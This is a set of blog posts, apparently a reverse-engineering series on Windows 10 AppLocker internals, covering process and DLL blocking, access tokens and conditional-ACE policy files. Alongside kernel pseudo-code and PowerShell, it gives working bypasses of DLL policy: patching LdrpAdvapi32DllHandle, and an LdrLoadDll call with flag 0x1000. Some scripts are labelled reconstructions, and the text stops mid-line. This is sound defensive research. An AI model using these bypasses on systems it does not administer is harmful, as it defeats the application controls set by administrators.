    There is one big difference in step 1 where the token is captured over the one I documented in part 3. In process blocking if the current token was a non-elevated UAC token then the code would query for the full elevated token and use that to do the access check. This means that even if you were creating a process as the non-elevated user the access check was still performed as if you were an administrator. In DLL blocking this step does not take place, which can lead to a weird case of being able to create a process in any location, but not being able to load any DLLs in the same directory with the default policy. I don't know if this is intentional or Microsoft just don't care?

    Who calls the Device IO Control to verify the DLL? To save me some effort I just set a breakpoint on SrpVerifyDll in the kernel debugger and then dumped the stack to find out the caller:

    Breakpoint 1 hit
    appid!SrpVerifyDll:
    fffff803`38cff100 48895c2410      mov qword ptr [rsp+10h],rbx
    0: kd> kc
     # Call Site
    00 appid!SrpVerifyDll
    01 appid!AipDeviceIoControlDispatch
    02 nt!IofCallDriver
    03 nt!IopSynchronousServiceTail
    04 nt!IopXxxControlFile
    05 nt!NtDeviceIoControlFile
    06 nt!KiSystemServiceCopyEnd
    07 ntdll!NtDeviceIoControlFile
    08 ADVAPI32!SaferpIsDllAllowed
    09 ADVAPI32!SaferiIsDllAllowed
    0a ntdll!LdrpMapDllNtFileName
    0b ntdll!LdrpMapDllFullPath
    0c ntdll!LdrpProcessWork
    0d ntdll!LdrpLoadDllInternal
    0e ntdll!LdrpLoadDll

    Easy, it's being called from the function SaferiIsDllAllowed which is being invoked from LdrLoadDll. This of course makes perfect sense, however it's interesting that NTDLL is calling a function in ADVAPI32; has MS never heard of layering violations? Let's look into LdrpMapDllNtFileName which is the last function in NTDLL before the transition to ADVAPI32. The code which calls SaferiIsDllAllowed looks like the following:

    NTSTATUS status;

    if ((LoadInfo->LoadFlags & 0x100) == 0 
            && LdrpAdvapi32DllHandle) {
      status = LdrpSaferIsDllAllowedRoutine(
            LoadInfo->FileHandle, LoadInfo->FileName);
    }

    The call to SaferiIsDllAllowed is actually made from a global function pointer. This makes sense as NTDLL can't realistically link directly to ADVAPI32. Something must be initializing these values, and that something is LdrpCodeAuthzInitialize. This initialization function is called during the loader initialization process before any non-system code runs in the new process. It first checks some registry keys, most importantly whether "\Registry\Machine\System\CurrentControlSet\Control\Srp\GP\DLL" has any sub-keys, and if so it proceeds to load the ADVAPI32 library using LdrLoadDll and query for the exported SaferiIsDllAllowed function. It stores the DLL handle in LdrpAdvapi32DllHandle and the function pointer 'XOR' encrypted in LdrpSaferIsDllAllowedRoutine.
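    You can quickly check whether that trigger key is populated, and so whether the loader will even set up the callback, from PowerShell:

    PS> Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Control\Srp\GP\DLL"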

    Once SaferiIsDllAllowed is called the status is checked. If it's not STATUS_SUCCESS then the loader backs out and refuses to continue loading the DLL. It's worth reiterating how different this is from WDAC, where the security checks are done inside the kernel image mapping process. You shouldn't be able to even create a mapped image section which isn't allowed by policy when WDAC is enforced. However with AL loading a DLL is just a case of bypassing the check inside a user mode component.

    If we look back at the calling code in LdrpMapDllNtFileName we notice there are two conditions which must be met before the check is made, the LoadFlags must not have the flag 0x100 set and LdrpAdvapi32DllHandle must be non-zero.

    The most obvious condition to modify is LdrpAdvapi32DllHandle. If you already have code running (say VBA) you could use WriteProcessMemory to modify the memory location of LdrpAdvapi32DllHandle to be 0. Now any calls to LoadLibrary will not get verified and you can load any DLL you like outside of policy. In theory you might also be able to get the load of ADVAPI32 to fail. However unless LdrLoadDll returns STATUS_NOT_FOUND for the DLL load then the error causes the process to fail during initialization. As ADVAPI32 is in the known DLLs I can't see an easy way around this (I tried by renaming the main executable trick from the AMSI bypass).

    The other condition, the LoadFlags, is more interesting. There still exists a documented LOAD_IGNORE_CODE_AUTHZ_LEVEL flag you can pass to LoadLibraryEx which used to be able to bypass AppLocker DLL verification. However, as with SANDBOX_INERT this in theory was limited to only System and TrustedInstaller with KB2532445, although according to Stefan Kanthak it might not be blocked. That said I can't get this flag to do anything on Windows 10 1909 and tracing through LdrLoadDll it doesn't look like it's ever used. Where does this 0x100 flag come from then? Seems it's set by the LdrpDllCharacteristicsToLoadFlags function at the start of LdrLoadDll, which looks like the following:

    int LdrpDllCharacteristicsToLoadFlags(int DllCharacteristics) {
      int load_flags = 0;
      // ...
      if (DllCharacteristics & 0x1000)
        load_flags |= 0x100;
       
      return load_flags;
    }

    If we pass in 0x1000 as a DllCharacteristics flag (this doesn't seem to work by putting it in the DLL PE headers as far as I can tell) which is the second parameter to LdrLoadDll then the DLL will not be verified against the DLL policy. The DLL Characteristic flag 0x1000 is documented as IMAGE_DLLCHARACTERISTICS_APPCONTAINER but I don't know what API sets this flag in the call to LdrLoadDll. My original guess was LoadPackagedLibrary but that doesn't seem to be the case.

    A simple PowerShell script to test this flag is below:
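    (The script was embedded in the original post as a gist; what follows is my minimal reconstruction assuming a direct LdrLoadDll P/Invoke, so treat it as a sketch rather than the original.)

    Add-Type @"
    using System;
    using System.Runtime.InteropServices;

    [StructLayout(LayoutKind.Sequential)]
    public struct UNICODE_STRING {
        public ushort Length;
        public ushort MaximumLength;
        [MarshalAs(UnmanagedType.LPWStr)] public string Buffer;
    }

    public static class Loader {
        [DllImport("ntdll.dll")]
        public static extern int LdrLoadDll(IntPtr SearchPath,
            ref int DllCharacteristics, ref UNICODE_STRING DllName,
            out IntPtr BaseAddress);
    }
    "@

    function Start-Dll {
        param([string]$Path, [int]$DllCharacteristics = 0)
        $name = New-Object UNICODE_STRING
        $name.Buffer = $Path
        $name.Length = [uint16]($Path.Length * 2)
        $name.MaximumLength = $name.Length
        $base = [IntPtr]::Zero
        # DLL characteristic 0x1000 becomes load flag 0x100 and skips the
        # SaferiIsDllAllowed check.
        $status = [Loader]::LdrLoadDll([IntPtr]::Zero, [ref]$DllCharacteristics,
            [ref]$name, [ref]$base)
        if ($status -ne 0) {
            throw ("LdrLoadDll failed with status 0x{0:X8}" -f $status)
        }
        Write-Host "Loaded at $base"
    }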
    If you run Start-Dll "Path\To\Any.DLL" where the DLL is not in an allowed location you should find it fails. However if you run Start-Dll "Path\To\Any.DLL" 0x1000 you'll find the DLL now loads.

    Of course realistically the DLL blocking is really about stopping someone bypassing the process blocking by using the DLL loader instead. Without being able to call LdrLoadDll or write to process memory it won't be easy to bypass the DLL verification (but of course it's not impossible).

    This is the last part on AL for a while, I've got to do other things. I might revisit this topic later to discuss AppX support, SmartLocker and some other fun tricks.

    The Internals of AppLocker - Part 3 - Access Tokens and Access Checking

    By: tiraniddo
    20 November 2019 at 06:30
    This is part 3 in a short series on the internals of AppLocker (AL). Part 1 is here, part 2 here and part 4 here.

    In the last part I outlined how process creation is blocked with AL. I crucially left out exactly how the rules are processed to determine if a particular user was allowed to create a process. As it makes more sense to do so, we're going to go in reverse order from how the process was described in the last post. Let's start with talking about the access check implemented by SrppAccessCheck.

    Access Checking and Security Descriptors

    For all intents the SrppAccessCheck function is just a wrapper around a specially exported kernel API, SeSrpAccessCheck. While the API has a few unusual features, for this discussion we might as well assume it to be the normal SeAccessCheck API. 

    A Windows access check takes 4 main parameters:
    • SECURITY_SUBJECT_CONTEXT which identifies the caller's access tokens.
    • A desired access mask.
    • A GENERIC_MAPPING structure which allows the access check to convert generic access to object specific access rights.
    • And most importantly, the Security Descriptor which describes the security of the resource being checked.
    Let's look at some code.

    NTSTATUS SrpAccessCheckCommon(HANDLE TokenHandle, BYTE* Policy) {
        
        SECURITY_SUBJECT_CONTEXT Subject = {};
        ObReferenceObjectByHandle(TokenHandle, &Subject.PrimaryToken);
        
        // The DWORD at offset 16 of the policy buffer is the offset to
        // the security descriptor within that same buffer.
        DWORD SecurityOffset = *((DWORD*)Policy + 4);
        PSECURITY_DESCRIPTOR SD = Policy + SecurityOffset;
        
        NTSTATUS AccessStatus;
        if (!SeSrpAccessCheck(&Subject, FILE_EXECUTE,
                              &FileGenericMapping, 
                              SD, &AccessStatus) &&
            AccessStatus == STATUS_ACCESS_DENIED) {
            return STATUS_ACCESS_DISABLED_BY_POLICY_OTHER;
        }
        
        return AccessStatus;
    }

    The code isn't very complex. First it builds a SECURITY_SUBJECT_CONTEXT structure manually from the access token passed in as a handle, then uses the policy pointer passed in to find the security descriptor for the check. Finally a call is made to SeSrpAccessCheck requesting file execute access. If the check fails with an access denied error it gets converted to the AL-specific policy error, otherwise any other success or failure code is returned.

    The only thing we don't really know in this process is what the Policy value is and therefore what the security descriptor is. We could trace through the code to find out how the Policy value is set, but sometimes it's just easier to breakpoint on the function of interest in a kernel debugger and dump the pointed-at memory. Taking the debugging approach shows the following:

    WinDBG window showing the hex output of the policy pointer which shows the on-disk policy.

    Well, what do we have here? We've seen those first 4 characters before: they're the magic signature of the on-disk policy files from part 1. SeSrpAccessCheck extracts a value from offset 16, which is used as an offset into the same buffer to get the security descriptor. Maybe the policy files already contain the security descriptor we seek? Writing some quick PowerShell, I ran it on the Exe.AppLocker policy file to see the result:

    PowerShell console showing the security output by the script from Exe.Applocker policy file.

    Success, the security descriptor is already compiled into the policy file! The following script defines two functions, Get-AppLockerSecurityDescriptor and Format-AppLockerSecurityDescriptor. Both take a policy file as input and return either a security descriptor object or a formatted representation:
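    (This is a reconstruction rather than the exact original script; it assumes the NtObjectManager module is installed and that NtApiDotNet's Ace class exposes the parsed Condition of a conditional ACE.)

    Import-Module NtObjectManager

    function Get-AppLockerSecurityDescriptor {
        param([Parameter(Mandatory)][string]$Path)
        $data = [System.IO.File]::ReadAllBytes($Path)
        # The DWORD at offset 16 is the offset of the security
        # descriptor within the policy file.
        $ofs = [System.BitConverter]::ToInt32($data, 16)
        $sd_bytes = $data[$ofs..($data.Length - 1)]
        New-Object NtApiDotNet.SecurityDescriptor -ArgumentList @(,[byte[]]$sd_bytes)
    }

    function Format-AppLockerSecurityDescriptor {
        param([Parameter(Mandatory)][string]$Path)
        $sd = Get-AppLockerSecurityDescriptor $Path
        # Dump each DACL entry; the condition is stored in the ACE's
        # application data as a binary expression.
        $sd.Dacl | Format-List Type, Mask, Sid, Condition
    }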

    If we run Format-AppLockerSecurityDescriptor on the Exe.AppLocker file we get the following output for the DACL (trimmed for brevity):

     - Type  : AllowedCallback
     - Name  : Everyone
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: APPID://PATH Contains "%WINDIR%\*"

     - Type  : AllowedCallback
     - Name  : BUILTIN\Administrators
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: APPID://PATH Contains "*"

     - Type  : AllowedCallback
     - Name  : Everyone
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: APPID://PATH Contains "%PROGRAMFILES%\*"

     - Type  : Allowed
     - Name  : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
     - Access: Execute|ReadAttributes|ReadControl|Synchronize

     - Type  : Allowed
     - Name  : APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES
     - Access: Execute|ReadAttributes|ReadControl|Synchronize

    We can see we have two ACEs which are for the Everyone group and one for the Administrators group. This matches up with the default configuration we setup in part 1. The last two entries are just there to ensure this access check works correctly when run from an App Container.

    The most interesting part is the Condition field. This is a rarely used (at least on consumer versions of the OS) feature of the kernel's access checking which allows a conditional expression to be evaluated to determine whether an ACE is enabled or not. In this case we're seeing the SDDL format (documentation) but under the hood it's actually a binary structure. If we assume that the '*' acts as a globbing character then again this matches our rules, which, let's remember, are:
    • Allow Everyone group access to run any executable under %WINDIR% and %PROGRAMFILES%.
    • Allow Administrators group to run any executable from anywhere.
    This is how AL's rules are enforced. When you configure a rule you specify a group, which is added as the SID in an ACE in the policy file's security descriptor. The ACE type is set to either Allow or Deny and then a condition is constructed which enforces the rule, whether it be a path, a file hash or a publisher.
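    You can even replay the check from user mode. The following sketch assumes the Get-AppLockerSecurityDescriptor function from earlier and that your on-disk policy lives at the path below (adjust as needed). The kernel evaluates the conditional ACEs against the caller's token attributes, so the result approximates what SrppAccessCheck would return for your current process:

    $sd = Get-AppLockerSecurityDescriptor "$env:windir\System32\AppLocker\Exe.AppLocker"
    # NtAccessCheck evaluates the conditional ACEs against the caller's
    # token attributes set at process creation time.
    Get-NtGrantedAccess -SecurityDescriptor $sd -Type (Get-NtType File)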

    In fact let's add policy entries for a hash and publisher and see what condition is set for them. Download a new policy file from this link and run the Set-AppLockerPolicy command in an admin PowerShell console. Then re-run Format-AppLockerSecurityDescriptor:

     - Type  : AllowedCallback
     - Name  : Everyone
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: (Exists APPID://SHA256HASH) && (APPID://SHA256HASH Any_of {#5bf6ccc91dd715e18d6769af97dd3ad6a15d2b70326e834474d952753118c670})

     - Type  : AllowedCallback
     - Name  : Everyone
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Flags : None
     - Condition: (Exists APPID://FQBN) && (APPID://FQBN >= {"O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\*", 0})

    We can now see the two new conditional ACEs, one for a SHA256 hash and one for the publisher subject name. Basically rinse and repeat: as more rules and conditions are added to the policy they'll be added to the security descriptor with the appropriate ACEs. Note that the ordering of the rules is very important; for example Deny ACEs will always go first. I assume the policy file generation code correctly handles the security descriptor generation, but you can now audit it to make sure.

    While we now understand how the rules are enforced, where do the values for the condition, such as APPID://PATH, come from? If you read the (poor) documentation about conditional ACEs you'll find these values are Security Attributes. The attributes can be either globally defined or assigned to an access token. Each attribute has a name, then a list of one or more values which can be strings, integers, binary blobs etc. This is what AL uses to store the data in the access check token.

    Let's go back a step and see what's going on with AiSetAttributesExe to see how these security attributes are generated.

    Setting Token Attributes

    The AiSetAttributesExe function takes 4 parameters:
    • A handle to the executable file.
    • Pointer to the current policy.
    • Handle to the primary token of the new process.
    • Handle to the token used for the access check.
    The code doesn't look very complex, at least initially:

    NTSTATUS AiSetAttributesExe(
                PVOID Policy, 
                HANDLE FileHandle, 
                HANDLE ProcessToken, 
                HANDLE AccessCheckToken) {
      
        PSECURITY_ATTRIBUTES SecAttr;
        AiGetFileAttributes(Policy, FileHandle, &SecAttr);
        NTSTATUS status = AiSetTokenAttributes(ProcessToken, SecAttr);
        if (NT_SUCCESS(status) && ProcessToken != AccessCheckToken)
            status = AiSetTokenAttributes(AccessCheckToken, SecAttr);
        return status;
    }

    All the code does is call AiGetFileAttributes, which fills in a SECURITY_ATTRIBUTES structure, and then call AiSetTokenAttributes to set the attributes on the ProcessToken and the AccessCheckToken (if different). AiSetTokenAttributes is pretty much a simple wrapper around the exported (and undocumented) kernel API SeSetSecurityAttributesToken, which takes the generated list of security attributes and adds them to the access token for later use in the access check.

    The first thing AiGetFileAttributes does is query the file handle for its full path; however, this is the native path and takes the form \Device\Volume\Path\To\File. A path of this form is pretty much useless if you want to generate a single policy to deploy across an enterprise, such as through Group Policy. Therefore the code converts it back to a Win32-style path such as c:\Path\To\File. Even then there's no guarantee that the OS drive is C:, and what about wanting to have executables on USB keys or other removable drives where the letter could change?

    To give the widest coverage the driver also maintains a fixed list of "macros" which look like environment variable expansions. These are used to replace the OS drive components as well as define placeholders for removable media. We already saw them in use in the dump of the security descriptor with string components like "%WINDIR%". You can find a list of the macros here, but I'll reproduce them below:
    • %WINDIR% - Windows Folder.
    • %SYSTEM32% - Both System32 and SysWOW64 (on x64).
    • %PROGRAMFILES% - Both Program Files and Program Files (x86).
    • %OSDRIVE% - The OS install drive.
    • %REMOVABLE% - Removable drive, such as a CD or DVD.
    • %HOT% - Hot-pluggable devices such as USB keys.
    Note that SYSTEM32 and PROGRAMFILES will map to either 32 or 64 bit directories when running on a 64 bit system (and presumably also ARM directories on ARM builds of Windows?). If you want to pick a specific directory you'll have to configure the rules to not use the macros.

    To hedge its bets AL puts every possible path configuration, native path, Win32 path and all possible macroed paths as string values in the APPID://PATH security attribute.

    AiGetFileAttributes continues, gathering the publisher information for the file. On Windows 10 the signature and certificate checking is done in multiple ways, first checking the kernel Code Integrity module (CI), then doing some internal work and finally falling back to calling over RPC to the running APPIDSVC. The information, along with the version number of the binary is put into the APPID://FQBN attribute, which stands for Fully Qualified Binary Name.

    The final step is generating the file hash, which is stored in a binary blob attribute. AL supports three hash algorithms with the following attribute names:
    • APPID://SHA256HASH - Authenticode SHA256.
    • APPID://SHA1HASH - Authenticode SHA1.
    • APPID://SHA256FLATHASH - SHA256 over entire file.
    As the attributes are applied to both tokens we should be able to see them on the primary token of a normal user process. By running the following PowerShell command we can see the added security attributes on the current process token.

    PS> $(Get-NtToken).SecurityAttributes | ? Name -Match APPID

    Name       : APPID://PATH
    ValueType  : String
    Flags      : NonInheritable, CaseSensitive
    Values     : {
       %SYSTEM32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE,
       %WINDIR%\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE,  
        ...}

    Name       : APPID://SHA256HASH
    ValueType  : OctetString
    Flags      : NonInheritable
    Values     : {133 66 87 106 ... 85 24 67}

    Name       : APPID://FQBN
    ValueType  : Fqbn
    Flags      : NonInheritable, CaseSensitive
    Values     : {Version 10.0.18362.1 - O=MICROSOFT CORPORATION, ... }


    Note that the APPID://PATH attribute is always added, however APPID://FQBN and APPID://*HASH are only generated and added if there are rules which rely on them.

    The Mystery of the Twin Tokens

    We've come to the final stage: we now know how the security attributes are generated and applied to the two access tokens. The question now is why are there two tokens, the process token and one just for access checking?

    Everything happens inside AiGetTokens, which is shown in a simplified form below:


    NTSTATUS AiGetTokens(HANDLE ProcessId,
                         PHANDLE ProcessToken,
                         PHANDLE AccessCheckToken)
    {
      // Open the new process' primary token from its PID.
      HANDLE TokenHandle;
      AiOpenTokenByProcessId(ProcessId, &TokenHandle);

      NTSTATUS status = STATUS_SUCCESS;
      *ProcessToken = TokenHandle;
      if (!AccessCheckToken)
        return STATUS_SUCCESS;

      BOOL IsRestricted;
      status = ZwQueryInformationToken(TokenHandle, TokenIsRestricted, &IsRestricted);

      DWORD ElevationType;
      status = ZwQueryInformationToken(TokenHandle, TokenElevationType, &ElevationType);

      // For a non-elevated UAC token query the linked (full) token.
      HANDLE NewToken = NULL;
      if (ElevationType != TokenElevationTypeFull)
        status = ZwQueryInformationToken(TokenHandle, TokenLinkedToken, &NewToken);

      if (!IsRestricted
        || NT_SUCCESS(status)
        || (status = SeGetLogonSessionToken(TokenHandle, 0, &NewToken), NT_SUCCESS(status))
        || status == STATUS_NO_TOKEN) {
        if (NewToken)
          *AccessCheckToken = NewToken;
        else
          *AccessCheckToken = TokenHandle;
      }

      return status;
    }

    Let's summarize what's going on. First, the easy one: the ProcessToken handle is just the process token opened from the process, based on its PID. If the AccessCheckToken is not specified then the function ends here. Otherwise the AccessCheckToken is set to one of three values:
    1. If the token is a non-elevated (UAC) token then use the full elevated token.
    2. If the token is 'restricted' and not a UAC token then use the logon session token.
    3. Otherwise use the primary token of the new process.
    We can now understand why a non-elevated UAC admin has Administrator rules applied to them. If you're running as the non-elevated user token then case 1 kicks in and sets the AccessCheckToken to the full administrator token. Now any rule checks which specify the Administrators group will pass.
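    You can see the inputs to case 1 from PowerShell. A quick sketch, assuming the NtObjectManager module:

    $token = Get-NtToken -Primary
    $token.ElevationType   # Limited for a non-elevated UAC admin.
    # The linked token is the full administrator token AL checks against.
    Get-NtToken -Linked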

    Case 2 is also interesting, a "restricted" token in this case is one which has been passed through the CreateRestrictedToken API and has restricted SIDs attached. This is used by various sandboxes especially Chromium's (and by extension anyone who uses it such as Firefox). Case 2 ensures that if the process token is restricted and therefore might not pass the access check, say the Everyone group is disabled, then the access check is done instead against the logon session's token, which is the master token from which all others are derived in a logon session.

    If nothing else matches then case 3 kicks in and just assigns the primary token to the AccessCheckToken. There are edge cases in these rules. For example you can use CreateRestrictedToken to create a new access token with disabled groups, but which doesn't have restricted SIDs. This results in case 2 not being applied and so the access check is done against the limited token, which could very easily fail to validate, causing the process to be terminated.

    There's also a more subtle edge case here if you look back at the code. If you create a restricted token of a UAC admin token then process creation typically fails during the policy check. When the UAC token is a full admin token the linked token query is never made, which results in NewToken being NULL. However in the final check IsRestricted is TRUE so the second condition is checked; as status is STATUS_SUCCESS (from the earlier successful ZwQueryInformationToken calls) this passes and we enter the if block without ever calling SeGetLogonSessionToken. As NewToken is still NULL, AccessCheckToken is set to the primary process token, which is the restricted token, and the subsequent access check fails. This is actually a long-standing bug in Chromium: it can't be run as UAC admin if AppLocker is enforced.

    That's the end of how AL does process enforcement. Hopefully it's been helpful. Next time I'll dig into how DLL enforcement works.

    Locking Resources to Specific Processes

    Before we go, here's a silly trick which might now be obvious. Ever wanted to restrict access to resources, such as files, to specific processes? With the AL-applied security attributes, now you can. All you need to do is apply the same conditional ACE syntax to your file and the kernel will do the enforcement for you. For example, create the text file C:\TEMP\ABC.TXT; to only allow notepad to open it, do the following in PowerShell:

    Set-NtSecurityDescriptor \??\C:\TEMP\ABC.TXT `
         -SecurityDescriptor 'D:(XA;;GA;;;WD;(APPID://PATH Contains "%SYSTEM32%\NOTEPAD.EXE"))' `
         -SecurityInformation Dacl

    Make sure that the path is in all upper case. You should now find that while PowerShell (or any other application) can't open the text file you can open and modify it just fine in notepad. Of course this won't work across network boundaries and is pretty easy to get around, but that's not my problem ;-)
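    A quick way to see the enforcement in action:

    # From PowerShell this open should now fail with access denied...
    Get-Content C:\TEMP\ABC.TXT
    # ...while notepad, whose token carries %SYSTEM32%\NOTEPAD.EXE in its
    # APPID://PATH attribute, opens the file just fine.
    notepad C:\TEMP\ABC.TXT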



    The Internals of AppLocker - Part 2 - Blocking Process Creation

    By: tiraniddo
    18 November 2019 at 06:06
    This is part 2 in a short series on the internals of AppLocker (AL). Part 1 is here, part 3 here and part 4 here.

    In the previous blog post I briefly discussed the architecture of AppLocker (AL) and how to setup a really basic test system based on Windows 10 1909 Enterprise. This time I'm going to start going into more depth about how AL blocks the creation of processes which are not permitted by policy. I'll reiterate in case you've forgotten that what I'm describing is the internals on Windows 10 1909, the details can and also certainly are different on other operating systems.

    How Can You Block Process Creation?

    When the APPID driver starts it registers a process notification callback with the PsSetCreateProcessNotifyRoutineEx API. A process notification callback can return an error code by assigning to the CreationStatus field of the PS_CREATE_NOTIFY_INFO structure to block process creation. If the kernel detects a callback setting an error code then the process is immediately terminated by calling PsTerminateProcess.

    An interesting observation is that the process notification callback is NOT called when the process object is created. It's actually called when the first thread is inserted into the process. The callback is made in the context of the thread creating the new thread, which is usually the thread creating the process, but it doesn't have to be. If you look in the PspInsertThread function in the kernel you'll find code which looks like the following:

    if (++Process->ActiveThreads == 1)
      CurrentFlags |= FLAG_FIRST_THREAD;
    // ...
    if (CurrentFlags & FLAG_FIRST_THREAD) {
      if (!Process->Flags3.Minimal || Process->PicoContext)
        PspCallProcessNotifyRoutines(Process);
    }

    This code first increments the active thread count for the process. If the current count is 1 then a flag is set for use later in the function. Further on the call is made to PspCallProcessNotifyRoutines to invoke the registered callbacks, which is where the APPID callback will be invoked.

    The fact that the callback seems to be called at process creation time is due to most processes being created using NtCreateUserProcess, which performs both the process and the initial thread creation as one operation. However, you could call NtCreateProcessEx to create a new process and that will succeed; you just couldn't, in theory, insert a thread into it without triggering the notification. Whether there's a race condition here, where ActiveThreads never equals exactly 1, I wouldn't like to say; almost certainly there's a process lock which would prevent it.

    The behavior of blocking process creation after the process has been created is the key difference between WDAC and AL. WDAC prevents the creation of any executable code which doesn't meet the defined policy, therefore if you try and create a process with an executable file which doesn't match the policy it'll fail very early in process creation. However AL will allow you to create a process, doing many of the initialization tasks, and only once a thread is inserted into the process will the rug be pulled away.

    The use of the process notification callback does have one current weakness: it doesn't work on Windows Subsystem for Linux processes. And when I say it doesn't work, I mean the APPID callback never gets invoked; as process creation is blocked by invoking the callback, this means any WSL process will run unmolested.

    It isn't anything to do with the checks for Minimal/PicoContext in the code above (or seemingly due to image formats as Alex Ionescu mentioned in his talk on WSL, although that might be why AL doesn't even try); it's due to the way the APPID driver has enabled its notification callback. Specifically APPID calls the PsSetCreateProcessNotifyRoutineEx method, however this will not generate callbacks for WSL processes. Instead APPID needs to use PsSetCreateProcessNotifyRoutineEx2 to get callbacks for WSL processes. While it's probably not worth MS implementing actual AL support for WSL processes I'm surprised they don't give an option to block outright rather than just allowing anything to run.

    Why Does AppLocker Decide to Block a Process?

    We now know how process creation is blocked, but we don't know why AL decides a process should be blocked. Of course we have our configured rules which must be enforced somehow. Each rule consists of three parts (a quick way to dump your configured rules is shown after the list):
    1. Whether the rule allows the process to be created or whether it denies creation.
    2. The User or Group the rule applies to.
    3. The property that the rule checks for, this could be an executable path, the hash of the executable file or publisher certificate and version information. A simple path example is "%WINDIR%\*" which allows any executable to run as long as it's located under the Windows Directory.
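    If you want to see these three parts in your own configuration, the built-in AppLocker PowerShell module will dump the effective policy as XML; each FilePathRule, FileHashRule or FilePublisherRule element carries the action, the user or group SID and the property being matched:

    PS> Get-AppLockerPolicy -Effective -Xml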
    Let's dig into the APPID process notification callback, AiProcessNotifyRoutine, to find out what is actually happening, the simplified code is below:

    void AiProcessNotifyRoutine(PEPROCESS Process, 
                                HANDLE ProcessId, 
                                PPS_CREATE_NOTIFY_INFO CreateInfo) {
      PUNICODE_STRING ImageFileName;
      if (CreateInfo->FileOpenNameAvailable)
        ImageFileName = CreateInfo->ImageFileName;
      else
        SeLocateProcessImageName(Process, &ImageFileName);

      CreateInfo->CreationStatus = AipCreateProcessNotifyRoutine(
                 ProcessId, ImageFileName, 
                 CreateInfo->FileObject, 
                 Process, CreateInfo);
    }

    The first thing the callback does is extract the path to the executable image for the process being checked. The PS_CREATE_NOTIFY_INFO structure passed to the callback can contain the image file path if the FileOpenNameAvailable flag is set. However there are situations where this flag is not set (such as in WSL) in which case the code gets the path using SeLocateProcessImageName. We know that having the full image path is important as that's one of the main selection criteria in the AL rule sets.

    The next call is to the inner function, AipCreateProcessNotifyRoutine. The returned status code from this function is assigned to CreationStatus, so if this function fails then the process will be terminated. There's a lot going on in this function; I'm going to simplify it as much as I can to get the basic gist of what's going on while glossing over some features such as AppX support and Smart Locker (though they might come back in a later blog post). For now it looks like the following:

    NTSTATUS AipCreateProcessNotifyRoutine(
            HANDLE ProcessId, 
            PUNICODE_STRING ImageFileName, 
            PFILE_OBJECT ImageFileObject, 
            PVOID Process, 
            PPS_CREATE_NOTIFY_INFO CreateInfo) {

        POLICY* Policy = SrpGetPolicy();
        if (!Policy)
            return STATUS_ACCESS_DISABLED_BY_POLICY_OTHER;
        
        HANDLE ProcessToken;
        HANDLE AccessCheckToken;
        
        AiGetTokens(ProcessId, &ProcessToken, &AccessCheckToken);

        if (AiIsTokenSandBoxed(ProcessToken))
            return STATUS_SUCCESS;

        BOOLEAN ServiceToken = SrpIsTokenService(ProcessToken);
        if (SrpServiceBypass(Policy, ServiceToken, 0, TRUE))
            return STATUS_SUCCESS;
        
        HANDLE FileHandle;
        AiOpenImageFile(ImageFileName,
                        ImageFileObject, 
                        &FileHandle);
        AiSetAttributesExe(Policy, FileHandle, 
                           ProcessToken, AccessCheckToken);
        
        NTSTATUS result = SrppAccessCheck(
                          AccessCheckToken,
                          Policy);
        
        if (!NT_SUCCESS(result)) {
            AiLogFileAndStatusEvent(...);
            if (Policy->AuditOnly)
                result = STATUS_SUCCESS;
        }
        
        return result;
    }

    A lot to unpack here, but we can start at the beginning. The first thing the code does is request the current global policy object. If there isn't a configured policy then the status code STATUS_ACCESS_DISABLED_BY_POLICY_OTHER is returned. You'll see this status code come up a lot when a process is blocked. Normally even if AL isn't enabled there's still a policy object, it'll just be configured to not block anything. I could imagine if somehow there was no global policy then every process creation would fail, which would not be good.
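    As an aside you can decode these policy status codes easily enough; assuming I have the value right, STATUS_ACCESS_DISABLED_BY_POLICY_OTHER is 0xC0000364:

    PS> Get-NtStatus 0xC0000364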

    Next we get into the core of the check, first with a call to the function AiGetTokens. This function opens a handle to the target process' access token based on its PID (why it doesn't just use the Process object from the PS_CREATE_NOTIFY_INFO structure escapes me, but this is probably just legacy code). It also returns a second token handle, the access check token; we'll see how this is important later.

    The code then checks two things based on the process token. First it checks AiIsTokenSandBoxed. Unfortunately this is badly named, at least in a modern context, as it doesn't refer to whether the token is a restricted token such as used in web browser sandboxes. What it actually checks is whether the token has the Sandbox Inert flag set. One way of setting this flag is by calling CreateRestrictedToken passing the SANDBOX_INERT flag. Since Windows 8, or Windows with KB2532445 installed, the "caller must be running as LocalSystem or TrustedInstaller or the system ignores this flag" according to the documentation. The documentation isn't entirely correct on this point; if you go and look at the implementation in NtFilterToken you'll find you can also set the flag if you have the SERVICE SID, which is basically all services regardless of type. The result of this check is that if the process token has the Sandbox Inert flag set then a success code is returned and AL is bypassed for this new process.
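    You can try this yourself. A sketch, assuming NtObjectManager's filtered token support and that NtToken exposes the SandboxInert property:

    # Ask for a sandbox inert filtered token; unless you're SYSTEM,
    # TrustedInstaller or have the SERVICE SID the kernel drops the flag.
    $token = Get-NtToken -Filtered -Flags SandboxInert
    $token.SandboxInert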

    The second check determines if the token is a service token, first calling SrpIsTokenService to get a true or false value, then calling SrpServiceBypass to determine if the current policy allows service tokens to bypass it as well. If SrpServiceBypass returns true then the callback also returns a success code, bypassing AL. It does seem to be possible to configure AL to enforce process checks on service processes, however I can't for the life of me find the documentation for this setting. It's probably far too dangerous a setting to allow the average sysadmin to use.

    What's considered a service context is very similar to setting the Sandbox Inert flag with CreateRestrictedToken. If you have one of the following groups in the process token it's considered a service:

    NT AUTHORITY\SYSTEM
    NT AUTHORITY\SERVICE
    NT AUTHORITY\RESTRICTED
    NT AUTHORITY\WRITE RESTRICTED

    The last two groups are only used to allow for services running as restricted or write restricted. Without them access would not be granted in the service check and AL might end up being enforced when it shouldn't be.
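    A rough user-mode approximation of this service check, again assuming NtObjectManager:

    $svc = 'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SERVICE',
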